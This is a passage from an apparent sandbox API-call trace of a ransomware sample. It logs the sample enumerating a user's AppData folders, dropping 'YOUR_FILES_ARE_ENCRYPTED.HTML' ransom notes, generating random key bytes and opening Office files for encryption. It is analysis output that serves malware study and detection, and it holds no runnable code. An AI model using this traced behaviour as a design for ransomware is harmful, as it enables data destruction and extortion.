cFileName="10_All_Music.wpl", cAlternateFileName="10_ALL~1.WPL")) returned 1 [0159.413] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\10_All_Music.wpl") returned 107 [0159.413] lstrcmpW (lpString1="10_All_Music.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.413] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0159.413] lstrlenW (lpString=".wpl") returned 4 [0159.413] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0159.413] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, 
nFileSizeLow=0x249, dwReserved0=0x0, dwReserved1=0x60, cFileName="11_All_Pictures.wpl", cAlternateFileName="11_ALL~1.WPL")) returned 1 [0159.413] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\11_All_Pictures.wpl") returned 110 [0159.413] lstrcmpW (lpString1="11_All_Pictures.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.413] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0159.413] lstrlenW (lpString=".wpl") returned 4 [0159.413] PathFindExtensionW (pszPath="11_All_Pictures.wpl") returned=".wpl" [0159.413] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 1 [0159.413] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\12_All_Video.wpl") returned 107 [0159.413] lstrcmpW (lpString1="12_All_Video.wpl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.413] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0159.413] lstrlenW (lpString=".wpl") returned 4 [0159.413] PathFindExtensionW (pszPath="12_All_Video.wpl") returned=".wpl" [0159.413] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25cba30, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd25cba30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x437, dwReserved0=0x0, dwReserved1=0x60, cFileName="12_All_Video.wpl", cAlternateFileName="12_ALL~1.WPL")) returned 0 [0159.413] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0159.415] wnsprintfW (in: pszDest=0x746a1d0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0159.415] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000FDBE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000fdbe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0159.417] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0159.419] CloseHandle (hObject=0x5b0) returned 1 [0159.426] GetProcessHeap () returned 0x270000 [0159.427] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x746a1d0 | out: hHeap=0x270000) returned 1 [0159.427] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8659c69f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="0000FDBE", cAlternateFileName="")) returned 0 [0159.427] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0159.428] wnsprintfW (in: pszDest=0x745a1c8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0159.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b4 [0159.428] WriteFile (in: hFile=0x5b4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.431] CloseHandle (hObject=0x5b4) returned 1 [0159.431] GetProcessHeap () returned 0x270000 [0159.432] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745a1c8 | out: hHeap=0x270000) returned 1 [0159.432] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd5756410, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5756410, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 0 [0159.432] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.432] wnsprintfW (in: pszDest=0x744a1c0, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0159.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\sync playlists\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0159.432] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.435] CloseHandle (hObject=0x5ac) returned 1 [0159.435] GetProcessHeap () returned 0x270000 [0159.436] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0159.436] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd4120340, ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 1 [0159.436] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache") returned 83 [0159.436] GetProcessHeap () returned 0x270000 [0159.436] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x744a1c0 [0159.436] lstrcpyW (in: lpString1=0x744a1c0, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache" [0159.436] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*" [0159.436] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd4120340, ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.437] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd4120340, ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.437] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd4120340, 
ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0159.437] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.437] wnsprintfW (in: pszDest=0x744a1c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0159.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\transcoded files cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0159.437] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.440] CloseHandle (hObject=0x5ac) returned 1 [0159.440] GetProcessHeap () returned 0x270000 [0159.441] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0159.441] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd4120340, ftCreationTime.dwHighDateTime=0x1d706b0, ftLastAccessTime.dwLowDateTime=0xd4120340, ftLastAccessTime.dwHighDateTime=0x1d706b0, ftLastWriteTime.dwLowDateTime=0xd4120340, ftLastWriteTime.dwHighDateTime=0x1d706b0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="Transcoded Files Cache", cAlternateFileName="TRANSC~1")) returned 0 [0159.441] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.441] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0159.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Media Player\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\media player\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.442] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.480] CloseHandle (hObject=0x4a8) returned 1 [0159.480] GetProcessHeap () returned 0x270000 [0159.481] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.482] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x5ad2f470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x5ad2f470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Office", cAlternateFileName="")) returned 1 [0159.482] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office") returned 54 [0159.482] GetProcessHeap () returned 0x270000 [0159.482] 
RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.483] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office" [0159.483] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\*" [0159.483] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x5ad2f470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x5ad2f470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.484] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x5ad2f470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x5ad2f470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.485] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x6a341890, 
ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6a341890, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="16.0", cAlternateFileName="")) returned 1 [0159.485] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0") returned 59 [0159.485] GetProcessHeap () returned 0x270000 [0159.486] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0159.486] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0" [0159.486] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\*" [0159.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x6a341890, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6a341890, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.486] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x141f2990, ftCreationTime.dwHighDateTime=0x1d709b8, 
ftLastAccessTime.dwLowDateTime=0x6a341890, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6a341890, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.486] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbc794980, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xbc794980, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xbc794980, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x139c4, dwReserved0=0x0, dwReserved1=0x60, cFileName="excel.exe_Rules.xml", cAlternateFileName="EXCELE~1.XML")) returned 1 [0159.487] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml") returned 79 [0159.487] lstrcmpW (lpString1="excel.exe_Rules.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.487] PathFindExtensionW (pszPath="excel.exe_Rules.xml") returned=".xml" [0159.487] lstrlenW (lpString=".xml") returned 4 [0159.487] PathFindExtensionW (pszPath="excel.exe_Rules.xml") returned=".xml" [0159.487] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0159.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\office\\16.0\\excel.exe_rules.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0159.488] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=80324) returned 1 [0159.488] 
GetProcessHeap () returned 0x270000 [0159.488] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0159.493] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="65") returned 2 [0159.493] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="AE") returned 2 [0159.493] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="DC") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="BE") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="39") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="C7") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="8E") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="08") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="32") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="BF") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="72") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="0F") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="D7") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="52") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="15") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="E2") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="7D") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="23") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="97") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="B7") returned 2 [0159.494] wsprintfW (in: 
param_1=0x4ebd162, param_2="%02X" | out: param_1="AA") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="74") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="53") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="50") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="08") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="62") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="19") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="B3") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="37") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="B1") returned 2 [0159.494] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="5B") returned 2 [0159.495] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="02") returned 2 [0159.495] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" [0159.495] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0159.495] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0159.496] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34fad830, ftCreationTime.dwHighDateTime=0x1d709b8, 
